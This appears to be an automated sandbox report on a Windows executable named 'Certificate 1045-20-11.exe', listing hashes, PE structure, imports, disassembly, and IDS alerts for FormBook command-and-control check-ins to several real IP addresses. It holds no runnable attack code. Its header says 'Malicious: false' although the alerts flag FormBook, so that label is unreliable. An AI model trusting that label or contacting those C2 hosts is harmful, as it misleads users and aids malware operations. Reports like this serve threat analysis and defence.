SHA-512: C0A88760349A7E9C204EAD6B536886898FA1149D45DE8DC8A142D48257F26ACC48AB34BA1F7B6B00D02BBCAB3215A1B61484DCB7B50C527D33966ED769A5C932
Malicious: false
Reputation: low
                                                                              Preview:..t..F270...H......ZT....K1..8BWC1ZWF270H95AP8BWC1ZWF270H95.P8BY\.TW.;...8y.ql*>0.*%)UEQ%.V >V-#cS?w4GY.!W...kb:,U?yK?=.H95AP8B.B8.j&U..(^.|0_.M.m&U.*..}0_.M.k&U.b!Z]|0_.WC1ZWF27`.95.Q9B.+..WF270H95.P:C\B:ZWV670H95AP8B.V1ZWV270h=5APxBWS1ZWD276H95AP8BQC1ZWF270h=5AR8BWC1ZUFr.0H)5A@8BWC!ZWV270H95QP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8By7T"#F27.G=5A@8BWS5ZWV270H95AP8BWC1ZwF2W0H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF27
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.126627911574051
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Certificate 1045-20-11.exe
File size: 1'196'032 bytes
MD5: 374bfa99caf54477156253c18125cdc8
SHA1: b252c1316f4d9b91e79f64c51365cf65981f64d1
SHA256: f605d6db615c055fc80141bf79ab3f541303cf082244b352352bbd982a7aca50
SHA512: c73c1b2ce3501abf103ba5586f2e6217dcaf3c551c3e9d4b8e088732ef387a6c3f630cce8bb745bec0f0fa2903fc9bac1577ce1b159cbf1a472099364e927a06
SSDEEP: 24576:otb20pkaCqT5TBWgNQ7ajmQK273J9BvzK2it6A:xVg5tQ7ajm81jzU5
TLSH: 9045CF1363DEC361C3B25273BA657741AEBF782506B1F86B2FD8093DE920121525EA73
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673E9BF2 [Thu Nov 21 02:33:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007FB98C85F83Fh
jmp 00007FB98C852854h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB98C8529DAh
cmp edi, eax
jc 00007FB98C852D3Eh
bt dword ptr [004C0158h], 01h
jnc 00007FB98C8529D9h
rep movsb
jmp 00007FB98C852CECh
cmp ecx, 00000080h
jc 00007FB98C852BA4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FB98C8529E0h
bt dword ptr [004BA370h], 01h
jc 00007FB98C852EB0h
bt dword ptr [004C0158h], 00000000h
jnc 00007FB98C852B7Dh
test edi, 00000003h
jne 00007FB98C852B8Eh
test esi, 00000003h
jne 00007FB98C852B6Dh
bt edi, 02h
jnc 00007FB98C8529DFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FB98C8529E3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FB98C852A35h
bt esi, 03h
jnc 00007FB98C852A88h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5aee4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11f000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5aee4 | 0x5b000 | 20ad2dc6c0173481b1de787fc61fdfb7 | False | 0.9277799836881868 | data | 7.893856171615236 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x521e9 | data | | | 1.0003300025865067
RT_GROUP_ICON | 0x11e9a4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11ea1c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11ea30 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11ea44 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11ea58 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11eb34 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | 
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T12:53:31.929353+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | TCP
2024-11-21T12:54:05.481825+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49762 | 116.50.37.244 | 80 | TCP
2024-11-21T12:55:28.530745+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49816 | 85.159.66.93 | 80 | TCP
2024-11-21T12:55:43.312625+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49983 | 91.195.240.94 | 80 | TCP
2024-11-21T12:56:06.621580+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50018 | 66.29.149.46 | 80 | TCP
2024-11-21T12:56:21.509284+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50022 | 195.110.124.133 | 80 | TCP
2024-11-21T12:56:52.795541+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50026 | 217.196.55.202 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 12:53:30.209798098 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 21, 2024 12:53:30.329397917 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 21, 2024 12:53:30.329524040 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 21, 2024 12:53:30.340529919 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 21, 2024 12:53:30.461769104 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 21, 2024 12:53:31.927459955 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 21, 2024 12:53:31.928101063 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 21, 2024 12:53:31.929352999 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 21, 2024 12:53:31.930541039 CET | 49736 | 80 | 192.168.2.4 | 154.215.72.110
Nov 21, 2024 12:53:32.050136089 CET | 80 | 49736 | 154.215.72.110 | 192.168.2.4
Nov 21, 2024 12:53:55.899571896 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:56.019675970 CET | 80 | 49738 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:53:56.019778967 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:56.022408962 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:56.143874884 CET | 80 | 49738 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:53:57.530338049 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:57.640067101 CET | 80 | 49738 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:53:57.640094042 CET | 80 | 49738 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:53:57.640168905 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:57.640202999 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:57.649928093 CET | 80 | 49738 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:53:57.649972916 CET | 49738 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:58.549316883 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:58.669424057 CET | 80 | 49745 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:53:58.669612885 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:58.672393084 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:53:58.792171955 CET | 80 | 49745 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:00.186676979 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:00.241486073 CET | 80 | 49745 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:00.241539955 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:00.241604090 CET | 80 | 49745 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:00.241651058 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:00.306333065 CET | 80 | 49745 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:00.306406021 CET | 49745 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:01.204654932 CET | 49751 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:01.324383020 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.324506044 CET | 49751 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:01.326410055 CET | 49751 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:01.446130991 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446146011 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446284056 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446295023 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446302891 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446429014 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446439028 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446455956 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:01.446465015 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:02.827543020 CET | 49751 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:02.947968006 CET | 80 | 49751 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:02.948060989 CET | 49751 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:03.845762968 CET | 49762 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:03.965328932 CET | 80 | 49762 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:03.965409040 CET | 49762 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:03.967367887 CET | 49762 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:04.087013960 CET | 80 | 49762 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:05.481537104 CET | 80 | 49762 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:05.481621027 CET | 80 | 49762 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:05.481825113 CET | 49762 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:05.485538960 CET | 49762 | 80 | 192.168.2.4 | 116.50.37.244
Nov 21, 2024 12:54:05.605086088 CET | 80 | 49762 | 116.50.37.244 | 192.168.2.4
Nov 21, 2024 12:54:19.116120100 CET | 49793 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:19.239120960 CET | 80 | 49793 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:19.239212036 CET | 49793 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:19.241039038 CET | 49793 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:19.360594034 CET | 80 | 49793 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:20.749244928 CET | 49793 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:20.869297981 CET | 80 | 49793 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:20.869373083 CET | 49793 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:21.767920017 CET | 49800 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:21.887551069 CET | 80 | 49800 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:21.887648106 CET | 49800 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:21.889743090 CET | 49800 | 80 | 192.168.2.4 | 85.159.66.93
